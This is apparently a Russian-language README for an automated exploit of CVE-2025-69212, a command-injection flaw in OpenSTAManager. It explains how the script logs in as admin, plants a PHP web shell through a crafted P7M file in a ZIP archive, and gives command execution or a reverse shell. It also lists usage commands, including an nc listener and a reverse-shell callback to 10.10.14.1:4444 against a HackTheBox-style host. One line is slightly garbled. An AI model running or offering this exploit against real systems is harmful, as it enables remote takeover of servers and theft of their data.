
Автоматизированный эксплойт для CVE-2025-69212 — инъекции команд в OpenSTAManager, включающий аутентификацию администратора, загрузку вредоносного ZIP-архива и reverse shell или выполнение команд.
Полностью автоматизированный эксплойт для CVE-2025-69212 — уязвимости внедрения команд в OpenSTAManager. Этот скрипт выполняет аутентификацию с учётными данными администратора, разворачивает вредоносный PHP-веб-шелл через специально созданный P7M-файл в ZIP-архиве и предоставляет выполнение команд или reverse shell.
invoice.p7m).python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>
Примеры:
Выполнение одной команды:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'
Получить reverse shell:
# Start your netcat listener in another terminal:
nc -lvnp 4444
# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444